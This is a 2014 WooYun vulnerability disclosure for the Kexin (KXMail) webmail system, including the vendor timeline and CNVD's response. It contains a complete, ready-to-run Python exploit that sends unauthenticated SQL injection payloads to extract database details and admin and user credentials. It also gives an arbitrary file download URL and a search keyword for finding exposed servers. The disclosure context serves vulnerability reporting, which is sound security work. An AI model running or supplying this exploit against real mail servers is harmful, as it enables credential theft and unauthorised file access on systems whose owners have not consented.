当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066892

漏洞标题:科信邮件系统漏洞注入文件任意下载等小集

相关厂商:科信软件

漏洞作者: Tea

提交时间:2014-07-01 19:15

修复时间:2014-09-29 19:16

公开时间:2014-09-29 19:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-07-01: 细节已通知厂商并且等待厂商处理中
2014-07-06: 厂商已经确认,细节仅向厂商公开
2014-07-09: 细节向第三方安全合作伙伴开放
2014-08-30: 细节向核心白帽子及相关领域专家公开
2014-09-09: 细节向普通白帽子公开
2014-09-19: 细节向实习白帽子公开
2014-09-29: 细节向公众公开

简要描述:

存在注入,任意文件下载,无需登录

详细说明:

代码都是加密过了的。。
直接给例子吧:
EXP:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#Author:Tea
#Date:2014/05/21
#Ky Mail Sql Injection Exp
import re
import sys
import base64
import urllib
import httplib
def sendhttp(Url, Sobject):
    RequestUrl = '/prog/get_passwd.server.php'
    Rex = re.compile('\w+=*(?=\"\;)')
    data = urllib.urlencode(Sobject).replace('+', '%20')
    headers = {"Content-type": "application/x-www-form-urlencoded","Accept": "text/html,application/xhtml+xml,application/xml"}
    conn = httplib.HTTPConnection(Url)
    conn.request('POST', RequestUrl, data, headers)
    HttpOpen = conn.getresponse()
    info = base64.b64decode(str(Rex.findall(HttpOpen.read())))
    HttpOpen.close()
    return info
def Get_Info(Urls ):
    Info = [
        '<xjxobj><e><k>setup</k><v>S1</v></e><e><k>user</k><v>S<![CDATA[\' or 1=1 and 1=2 Union select user()#]]></v></e></xjxobj>',
        '<xjxobj><e><k>setup</k><v>S1</v></e><e><k>user</k><v>S<![CDATA[\' or 1=1 and 1=2 Union select database()#]]></v></e></xjxobj>',
        '<xjxobj><e><k>setup</k><v>S1</v></e><e><k>user</k><v>S<![CDATA[\' or 1=1 and 1=2 Union select version()#]]></v></e></xjxobj>',
        '<xjxobj><e><k>setup</k><v>S1</v></e><e><k>user</k><v>S<![CDATA[\' or 1=1 and 1=2 Union select @@datadir#]]></v></e></xjxobj>',
        '<xjxobj><e><k>setup</k><v>S1</v></e><e><k>user</k><v>S<![CDATA[\' or 1=1 and 1=2 Union select concat(sys_id,0x3a,sys_user,0x3a,sys_pass) from system_user limit 0,1#]]></v></e></xjxobj>,',
        '<xjxobj><e><k>setup</k><v>S1</v></e><e><k>user</k><v>S<![CDATA[\' or 1=1 and 1=2 Union select concat(id,0x3a,uid,0x3a,passwd,0x3a,email) from user limit 0,1#]]></v></e></xjxobj>'
    ]
    Result = []
    for i in xrange(len(Info)):
        Urlpars = {
            'xjxfun' : 'DoOperate',
            'xjxargs[]' : Info[i]
        }
        Result.append(sendhttp(Urls, Urlpars))
    return Result
def main():
    if len(sys.argv) != 2:
        print 'Use: %s www.baidu.com' % sys.argv[0]
        sys.exit()
    Vurl = sys.argv[1]
    print 'Author:Tea'
    print '-------------------------------------------------------------------------------'
    Info = Get_Info(Vurl)
    for i in range(len(Info)):
        print 'Info: %s' % Info[i]
if __name__ == '__main__':
    main()


关键字:
powered by kxmail
另外任意文件下载:
http://mail.xxx.com/prog/get_composer_att.php?att_size=1623&filenamepath=C:\boot.ini&maxatt_sign=4bc882e8c4a98ac7a97acd321aad4f88&attach_filename=boot.ini
&attach_filename=boot.ini 保存文件名
&filenamepath=C:\boot.ini 下载的文件路径以及文件名

漏洞证明:

漏洞证明:

1.jpg


2.jpg


3.jpg

修复方案:

都是无需登录,注入,跟任意文件下载,你们比我清楚,看不见代码。

版权声明:转载请注明来源 Tea@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-07-06 11:06

厂商回复:

CNVD确认并复现所述多个实例情况,由CNVD再次协调软件生产厂商处置,联系科信软件,189 8218 ****,对方不配合处置,后发网站客服邮箱service 。

最新状态:

暂无